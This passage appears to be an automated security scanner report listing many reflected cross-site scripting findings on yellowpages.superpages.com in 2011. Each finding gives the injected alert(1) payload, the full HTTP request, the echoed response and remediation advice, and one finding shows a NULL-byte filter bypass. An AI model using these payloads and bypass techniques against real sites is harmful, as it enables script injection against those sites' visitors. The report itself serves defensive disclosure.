Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 03 Feb 2011 17:10:53 GMT Connection: close
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57369 Date: Thu, 03 Feb 2011 17:10:47 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
4.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/listings.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56970 Date: Thu, 03 Feb 2011 17:10:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ges.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56887 Date: Thu, 03 Feb 2011 17:10:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... om'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
4.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 32667 Date: Thu, 03 Feb 2011 17:10:08 GMT Connection: close
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
